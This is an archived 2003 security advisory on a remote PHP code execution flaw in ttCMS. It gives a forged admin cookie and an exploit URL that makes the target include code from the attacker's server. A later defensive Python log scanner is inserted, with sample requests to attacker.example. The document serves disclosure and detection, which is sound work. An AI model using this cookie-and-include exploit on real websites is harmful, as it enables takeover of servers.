Remote code execution in ttCMS <=v2.3

From: ScriptSlaveat_private
Date: Sat May 17 2003 - 12:02:04 PDT


    Advisory name: Remote code execution in ttCMS 2.2.0/2.2.1
    Application: ttCMS v2.3 (and older versions)
    Vendor: www.ttcms.com
    Status: Vendor was contacted but didn't reply - after posting about another
    hole on his forums, my account was banned
    Impact: Attacker can execute arbitrary php code 
    Platform(s): Unix 
    
    Technical description:
    ----------------------
    
    Anyone can inject PHP code into ttCMS through the file "header.php"
    in the directory admin/templates/: the path used in its include_once()
    call, $admin_root, is not set before use, so with register_globals
    enabled it can be supplied by the request.
    
    header.php (excerpt):
    ------------------------------------------
    // $HTTP_COOKIE_VARS is filled from the client's Cookie header, so the
    // "admin" check trusts a value the client controls
    if ($HTTP_COOKIE_VARS["ttcms_user_admin"] > 0) {
        // nothing in this excerpt sets $admin_root; with register_globals
        // on, a request parameter of that name fills it in
        include_once("$admin_root/templates/header.inc.php");
    } else {
        header("Location: $admin_root_url/login.php");
        exit;
    }
    ------------------------------------------
    
    All you have to do is send a fake cookie containing
    
    ------------------------------------------
    ttcms_user_admin=1
    ------------------------------------------
    
    (this can easily be done by using a tool like Proxomitron or
    Anonymity4Proxy)
    
    In order to exploit this vulnerability, you have to create a
    file "templates/header.inc.php" on your own webserver which
    contains the code you want to execute on the target system.
    
    If you now call the file "header.php" like this:
    
    ------------------------------------------
    http://target/admin/templates/header.php?admin_root=http://yourserver/
    ------------------------------------------
    
    the code in "templates/header.inc.php" on your own webserver will be
    injected. (Of course, PHP execution must be disabled on your machine, or
    you must use an FTP server to store the file you want to inject, so that
    the PHP source is served rather than run locally.)
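
As an added defensive example (not part of the original advisory), the following Python scans Apache-style access log lines for requests to admin/templates/header.php whose admin_root parameter carries a remote URL, which is the query-string half of the attack described above. The log lines, hostnames and IP addresses are constructed placeholders.

```python
"""Flag web-server requests matching the ttCMS header.php remote-include
pattern: a hit on admin/templates/header.php whose admin_root query
parameter is an absolute URL. Log lines below are constructed samples in
Apache combined log format; hosts and addresses are placeholders."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [17/May/2003:12:00:01 -0700] "GET /admin/templates/header.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
10.0.0.9 - - [17/May/2003:12:00:02 -0700] "GET /admin/templates/header.php?admin_root=http://attacker.example/ HTTP/1.1" 200 512 "-" "curl/7.10"
10.0.0.9 - - [17/May/2003:12:00:03 -0700] "GET /admin/templates/header.php?admin_root=ftp%3A%2F%2Fattacker.example%2F HTTP/1.1" 200 512 "-" "curl/7.10"
10.0.0.7 - - [17/May/2003:12:00:04 -0700] "GET /index.php?admin_root=foo HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO" ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
# Any URL scheme (http, ftp, ...) makes the include fetch a remote file.
REMOTE_SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def is_remote_include_attempt(target: str) -> bool:
    """True when the request targets header.php and admin_root is an absolute URL.

    parse_qs percent-decodes values, so encoded schemes are caught as well."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/admin/templates/header.php"):
        return False
    for value in parse_qs(parts.query).get("admin_root", []):
        if REMOTE_SCHEME_RE.match(value.strip()):
            return True
    return False


def scan_log(text: str) -> list[dict]:
    """Return one record per suspicious request found in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request record; skip
        if is_remote_include_attempt(m.group("target")):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "target": m.group("target")})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['target']}")
```

A standard combined log does not record the Cookie header, so this flags only the admin_root override, not the forged ttcms_user_admin cookie.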
    
    Recommendations:
    ----------------
    Run ttCMS in a secure environment.
    Disable register_globals in php.ini.
    Update to a newer version of ttCMS (currently, none exists).
    
    This archive was generated by hypermail 2b30 : Sat May 17 2003 - 13:06:03 PDT